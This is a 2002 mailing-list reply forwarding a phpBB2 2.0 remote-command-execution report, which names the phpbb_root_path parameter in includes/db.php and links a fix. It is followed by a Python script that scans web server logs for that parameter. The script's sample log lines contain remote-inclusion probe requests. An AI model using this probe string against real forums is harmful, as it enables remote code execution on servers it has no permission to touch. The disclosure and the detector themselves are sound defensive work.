Vulnerability Development mailing list archives
Re: phpBB2 remote execution command (fwd)
From: Jose Romeo Vela <jrvela () aristasol com>
Date: Mon, 18 Mar 2002 20:17:42 -0500 (EST)
--- nullbyte <nullbyte () inetd-secure net> wrote:
phpBB2 is vulnerable to remote execution command

All *nix running phpBB2 version 2.0.

Bug could be found at "phpBB2 root path" which allows a remote attacker to execute any command remotely. The vulnerability of this attack starts with '/phpBB2/includes/db.php?phpbb_root_path=' but some backdoor server is needed to launch the attack. I did not look further into this bug. It is tested on most *nix systems running phpBB2 version 2.0. Probably all versions.

Bug was found by pokley and nullbyte

nullbyte
nullbyte () inetd-secure net

This bug only affects non-CVS versions. There is a fix available. For details see:

http://phpbb.sourceforge.net/phpBB2/viewtopic.php?t=9105

---------------------------------------------------------------------
Jose Romeo Vela
jrvela () aristasol com
http://www.aristasol.com/
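
For defenders checking whether a board was probed before the fix went in, the following is an added example, not part of either post or of phpBB: it scans web server access logs for requests that supply the phpbb_root_path parameter named above. The log lines, hosts and the rule that any client-supplied phpbb_root_path is suspicious are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache common log format); hosts are placeholders.
SAMPLE_LOG = """\
198.51.100.4 - - [18/Mar/2002:19:58:02 -0500] "GET /phpBB2/viewtopic.php?t=9105 HTTP/1.0" 200 8841
203.0.113.7 - - [18/Mar/2002:20:01:11 -0500] "GET /phpBB2/includes/db.php?phpbb_root_path=http://host.example/ HTTP/1.0" 200 512
203.0.113.7 - - [18/Mar/2002:20:01:40 -0500] "GET /forum/includes/db.php?%70hpbb_root_path=http%3A%2F%2Fhost.example%2F HTTP/1.0" 200 498
198.51.100.9 - - [18/Mar/2002:20:05:13 -0500] "GET /phpBB2/includes/db.php?phpbb_root_path=./ HTTP/1.0" 200 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+)[^"]*" (\d{3})')
PARAM = "phpbb_root_path"                      # parameter named in the post
URL_RE = re.compile(r"^([a-z][a-z0-9+.-]*:)?//", re.I)  # scheme:// or //host


def classify(line):
    """Return (client, path, status, verdict) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    # parse_qs percent-decodes names and values once, so an encoded
    # parameter name such as %70hpbb_root_path is still recognised.
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    remote = any(URL_RE.match(v.strip()) for v in values)
    return client, parts.path, int(status), "remote-url" if remote else "param-set"


def scan(log_text):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

Access logs record only the query string, so a parameter sent in a POST body or cookie would not appear here.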